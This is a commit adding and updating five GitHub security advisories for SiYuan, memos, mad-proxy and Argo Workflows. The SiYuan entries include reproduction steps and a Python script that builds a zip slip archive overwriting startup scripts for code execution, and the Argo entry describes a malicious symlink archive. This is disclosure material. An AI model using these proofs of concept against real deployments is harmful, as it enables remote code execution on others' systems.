Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit b70f1fe3fce4 · 2025-12-09T17:19:05.000Z
GHSA-4r66-7rcv-x46x GHSA-99m2-qwx6-2w6f GHSA-gqfv-g4v7-m366 GHSA-wx63-35hw-2482 GHSA-xrqc-7xgx-c9vh
diff --git a/advisories/github-reviewed/2025/12/GHSA-4r66-7rcv-x46x/GHSA-4r66-7rcv-x46x.json b/advisories/github-reviewed/2025/12/GHSA-4r66-7rcv-x46x/GHSA-4r66-7rcv-x46x.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4r66-7rcv-x46x",
+  "modified": "2025-12-09T17:18:16Z",
+  "published": "2025-12-09T17:18:16Z",
+  "aliases": [],
+  "summary": "SiYuan vulnerable to RCE via zip slip and Command Injection via PandocBin",
+  "details": "### Summary\nSiyuan is vulnerable to RCE. The issue stems from a \"Zip Slip\" vulnerability during zip file extraction, combined with the ability to overwrite system executables and subsequently trigger their execution.\n\n### Steps to reproduce\n1. Authenticate\n2. Create zip slip payload with path traversal entry `../../../../opt/siyuan/startup.sh`. startup.sh contains malicious code like:\n```bash\n#!/bin/sh\necho 'you have been pwned' > /siyuan/workspace/data/pwned.txt\necho \"pandoc 3.1.0\"\n```\n3. Upload zip to workspace via `/api/file/putFile`\n4. Extract zip via `/api/archive/unzip`, overwrites the existing executable `startup.sh` while maintaining the +x permission\n5. Trigger execution by calling `/api/setting/setExport` with `pandocBin=/opt/siyuan/startup.sh`. This calls `IsValidPandocBin()` which executes `startup.sh --version` that outputs \"pandoc 3.1.0\" and executes any arbitrary malicious code",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/siyuan-note/siyuan/kernel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.0.0-20251202123337-6ef83b42c7ce"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4r66-7rcv-x46x"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/siyuan-note/siyuan"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-12-09T17:18:16Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/12/GHSA-99m2-qwx6-2w6f/GHSA-99m2-qwx6-2w6f.json b/advisories/github-reviewed/2025/12/GHSA-99m2-qwx6-2w6f/GHSA-99m2-qwx6-2w6f.json
@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-99m2-qwx6-2w6f",
-  "modified": "2025-12-08T21:30:22Z",
+  "modified": "2025-12-09T17:18:37Z",
   "published": "2025-12-08T18:30:44Z",
   "aliases": [
     "CVE-2025-65797"
   ],
+  "summary": "memos vulnerability allows arbitrarily modification or deletion registered identity providers",
   "details": "Incorrect access control in the Identity Provider service of usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete registered identity providers, leading to an account takeover or Denial of Service (DoS).",
   "severity": [
     {
       "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/usememos/memos"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.25.3"
+            }
+          ]
+        }
+      ]
     }
   ],
-  "affected": [],
   "references": [
     {
       "type": "ADVISORY",
@@ -23,6 +44,14 @@
       "type": "WEB",
       "url": "https://github.com/usememos/memos/pull/5217"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/usememos/memos/commit/769dcd0cf9be83d472829f6e7903b201e42f6b3c"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/usememos/memos"
+    },
     {
       "type": "WEB",
       "url": "https://herolab.usd.de/security-advisories/usd-2025-0057"
@@ -40,9 +69,9 @@
     "cwe_ids": [
       "CWE-284"
     ],
-    "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-12-09T17:18:36Z",
     "nvd_published_at": "2025-12-08T17:16:21Z"
   }
 }
diff --git a/advisories/github-reviewed/2025/12/GHSA-gqfv-g4v7-m366/GHSA-gqfv-g4v7-m366.json b/advisories/github-reviewed/2025/12/GHSA-gqfv-g4v7-m366/GHSA-gqfv-g4v7-m366.json
@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-gqfv-g4v7-m366",
+  "modified": "2025-12-09T17:18:04Z",
+  "published": "2025-12-09T17:18:04Z",
+  "aliases": [
+    "CVE-2025-67488"
+  ],
+  "summary": "SiYuan: ZipSlip -> Arbitrary File Overwrite -> RCE",
+  "details": "### Summary\nFunction [**importZipMd**](https://github.com/siyuan-note/siyuan/blob/dae6158860cc704e353454565c96e874278c6f47/kernel/api/import.go#L190) is vulnerable to **ZipSlip** which allows an authenticated user to overwrite files on the system.\n\n### Details\nAn authenticated user with access to the import functionality in notes is able to overwrite any file on the system, the vulnerable function is  [**importZipMd**](https://github.com/siyuan-note/siyuan/blob/dae6158860cc704e353454565c96e874278c6f47/kernel/api/import.go#L190), this can escalate to full code execution under some circumstances, for example using the official **docker image** it is possible to overwrite **entrypoint.sh** and after a container restart it will execute the changed code causing remote code execution.\n\n### PoC\nCode used to generate the ZipSlip:\n```python\n#!/usr/bin/env python3\nimport sys, base64, zipfile, io, time\n\ndef prepare_zipslip(filename):\n    orgfile1 = open('Test.md','rb').read()\n    payload =  open('entrypoint.sh','rb').read() #b\"testpayload\"\n    \n    zipslip = io.BytesIO()\n    with zipfile.ZipFile(zipslip, 'w', compression=zipfile.ZIP_DEFLATED) as zipf:        \n        info = zipfile.ZipInfo('Test.md')\n        mtime = time.time()\n        t = time.localtime(mtime)\n        info.date_time = (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec)\n        zipf.writestr(info, orgfile1)\n        \n        info = zipfile.ZipInfo(filename)\n        mtime = time.time()\n        t = time.localtime(mtime)\n        info.date_time = (t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec)\n        zipf.writestr(info, payload)\n    return zipslip.getvalue()\n\ngz = prepare_zipslip('../../../../../../../../../../opt/siyuan/entrypoint.sh')\nopen('exp.zip', 'wb').write(gz)\n```\n\n### Impact\nThe exploit is possible only if the attacker has access to **import** functionality. It's possible to achieve code execution and some persistence within the container",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/siyuan-note/siyuan/kernel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.0.0-20251202123337-6ef83b42c7ce"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-gqfv-g4v7-m366"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/siyuan-note/siyuan"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/blob/dae6158860cc704e353454565c96e874278c6f47/kernel/api/import.go#L190"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-12-09T17:18:04Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/12/GHSA-wx63-35hw-2482/GHSA-wx63-35hw-2482.json b/advisories/github-reviewed/2025/12/GHSA-wx63-35hw-2482/GHSA-wx63-35hw-2482.json
@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-wx63-35hw-2482",
+  "modified": "2025-12-09T17:17:48Z",
+  "published": "2025-12-09T17:17:48Z",
+  "aliases": [
+    "CVE-2025-67485"
+  ],
+  "summary": "HTTP/HTTPS Traffic Interception Bypass in mad-proxy",
+  "details": "A vulnerability in mad-proxy versions <= 0.3 allows attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "mad-proxy"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.3"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/machphy/mad-proxy"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-693"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-12-09T17:17:48Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/12/GHSA-xrqc-7xgx-c9vh/GHSA-xrqc-7xgx-c9vh.json b/advisories/github-reviewed/2025/12/GHSA-xrqc-7xgx-c9vh/GHSA-xrqc-7xgx-c9vh.json
@@ -0,0 +1,108 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xrqc-7xgx-c9vh",
+  "modified": "2025-12-09T17:17:22Z",
+  "published": "2025-12-09T17:17:22Z",
+  "aliases": [
+    "CVE-2025-66626"
+  ],
+  "summary": " RCE via ZipSlip and symbolic links in argoproj/argo-workflows",
+  "details": "### Summary\nThe patch deployed against CVE-2025-62156 is ineffective against malicious archives containing symbolic links.\n\n### Details\nThe untar code that handles symbolic links in archives is unsafe. Concretely, the computation of the link's target and the subsequent check are flawed: \nhttps://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037\n\n### PoC\n1. Create a malicious archive containing two files: a symbolik link with path \"./work/foo\" and target \"/etc\", and a normal text file with path \"./work/foo/hostname\".\n2. Deploy a workflow like the one in https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf with the malicious archive mounted at /work/tmp.\n3. Submit the workflow and wait for its execution. \n4. Connect to the corresponding pod and observe that the file \"/etc/hostname\" was altered by the untar operation performed on the malicious archive. The attacker can hence alter arbitrary files in this way. \n\n### Impact\nThe attacker can overwrite the file /var/run/argo/argoexec with a script of their choice, which will be executed at the pod's start.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/argoproj/argo-workflows/v3"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.7.0"
+            },
+            {
+              "fixed": "3.7.5"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/argoproj/argo-workflows/v3"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.6.14"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/argoproj/argo-workflows"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.5.3-rc4"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xrqc-7xgx-c9vh"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/argoproj/argo-workflows/commit/6b92af23f35aed4d4de8b04adcaf19d68f006de1"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://github.com/advisories/GHSA-p84v-gxvw-73pf"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/argoproj/argo-workflows"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-23",
+      "CWE-78"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-12-09T17:17:22Z",
+    "nvd_published_at": null
+  }
+}
